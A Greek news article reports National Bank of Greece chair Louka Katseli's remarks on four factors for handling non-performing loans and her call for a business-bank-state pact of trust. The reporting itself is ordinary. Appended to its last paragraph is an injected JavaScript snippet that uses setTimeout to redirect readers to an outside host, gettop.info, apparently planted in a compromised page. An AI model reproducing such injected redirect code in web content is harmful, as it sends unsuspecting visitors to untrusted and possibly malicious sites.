Κατσέλη: Οι τέσσερις παράμετροι που θα κρίνουν το «στοίχημα» των τραπεζών για τα «κόκκινα» δάνεια

0
5

 

Η πρόεδρος της Εθνικής Τράπεζας Λούκα Κατσέλη, στην διάρκεια δείπνου που παρέθεσε η διοίκηση του ιδρύματος σε επιχειρηματίες της Βόρειας Ελλάδας, επισήμανε ότι η έκβαση της πρόκλησης της διαχείρισης των μη εξυπηρετούμενων δανείων θα εξαρτηθεί από το πόσο γρήγορα θα προωθηθούν τα εξής:

Πρώτον, οι αναγκαίες βελτιώσεις στο ρυθμιστικό πλαίσιο, συμπεριλαμβανομένου του πτωχευτικού δικαίου.

Δεύτερον, η εναρμόνιση κινήτρων για την εξεύρεση κοινά αποδεκτών λύσεων, που αφορούν τόσο στους ιδιοκτήτες όσο και στις τράπεζες.

Τρίτον, ο βαθμός συντονισμού και η τεχνογνωσία των τραπεζών στην προώθηση καινοτόμων προϊόντων αναδιάρθρωσης που ν’ ανταποκρίνονται στις ανάγκες των πελατών.

Τέταρτον, η δυνατότητα εκχώρησης μη εξυπηρετούμενων δανείων σε τρίτους, είτε προς διαχείριση είτε προς πώληση.

«Αν η διαχείριση των μη εξυπηρετούμενων δανείων γίνει αποτελεσματικά, τότε θα απελευθερωθούν κεφάλαια τα οποία σήμερα είναι δεσμευμένα για την απορρόφηση τυχόν ζημιών και θα διοχετευθούν στην οικονομία για την επανεκκίνηση βιώσιμων επιχειρηματικών μονάδων» σημείωσε η πρόεδρος της Εθνικής Τράπεζας.

Αναφερόμενη γενικά στα όσα πρέπει να γίνουν για να οργανωθεί η ανάπτυξη στην Ελλάδα, εξέφρασε την πεποίθηση ότι χρειάζεται βιώσιμη και ισχυρή συμμαχία μεταξύ του επιχειρηματικού κόσμου, του τραπεζικού τομέα και του κράτους, ένα νέο ισχυρό και βιώσιμο συμβόλαιο συνεργασίας και εμπιστοσύνης.

«Οι επιχειρήσεις έχουν ανάγκη από πιστωτικά κεφάλαια για να χρηματοδοτούν τις δραστηριότητές τους. Έχουν ανάγκη από ένα απλό και φιλικό ρυθμιστικό περιβάλλον που θα δίνει κίνητρα για επενδύσεις, καινοτομία, εξωστρέφεια και τη δημιουργία θέσεων εργασίας.

»Οι τράπεζες έχουν ανάγκη υγιή και βιώσιμα επιχειρηματικά και επενδυτικά σχέδια, προκειμένου να κατευθύνουν τα κεφάλαια που τους εμπιστεύονται οι καταθέτες τους.

»Το κράτος έχει μόνο να ωφεληθεί από ένα σταθερό και βιώσιμο τραπεζικό και επιχειρηματικό σύστημα, που επενδύει, είναι κερδοφόρο, παράγει έσοδα, προστιθέμενη αξία και απασχόληση.

Ένα νέο ισχυρό συμβόλαιο συνεργασίας και εμπιστοσύνης επιχειρήσεων – τραπεζών – κράτους είναι επομένως ο καταλύτης για να δημιουργηθούν νέες πηγές ανταγωνιστικού πλεονεκτήματος, που όχι μόνο θα αποτρέψουν την εκδήλωση νέων κρίσεων στο μέλλον, αλλά θα βελτιώσουν τις συνθήκες διαβίωσης και θα δημιουργήσουν νέες ευκαιρίες για τις επόμενε γενιές» σημείωσε.
Πρόσθεσε ότι μεγάλη και κρίσιμη πρόκληση τόσο για την Εθνική, όσο και συνολικά για το χρηματοπιστωτικό σύστημα, παραμένει η βελτίωση της ρευστότητας και της κερδοφορίας, μέσω της σταδιακής επιστροφής της καταθετικής βάσης και της επέκτασης δανειοδότησης και συμμετοχών σε κερδοφόρες δραστηριότητες.

«Αυτό προϋποθέτει αποκατάσταση της πολιτικής και οικονομικής αβεβαιότητας, αποτελεσματική διαχείριση των μη εξυπηρετούμενων δανείων, αλλά και εμπέδωση μίας νέας σχέσης εμπιστοσύνης μεταξύ τραπεζών – καταθετών – επιχειρήσεων – κράτους. Η άρση των περιορισμών στην κίνηση κεφαλαίων, η διάδοση της ηλεκτρονικής τραπεζικής που συντελεί στη διεύρυνση της φορολογικής βάσης, αλλά και η άσκηση φορολογικής πολιτικής, που δεν θα λειτουργεί ως αντικίνητρο για την αύξηση των καταθέσεων, αποτελούν προϋποθέσεις στη σφυρηλάτηση σχέσεων εμπιστοσύνης» επισήμανε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here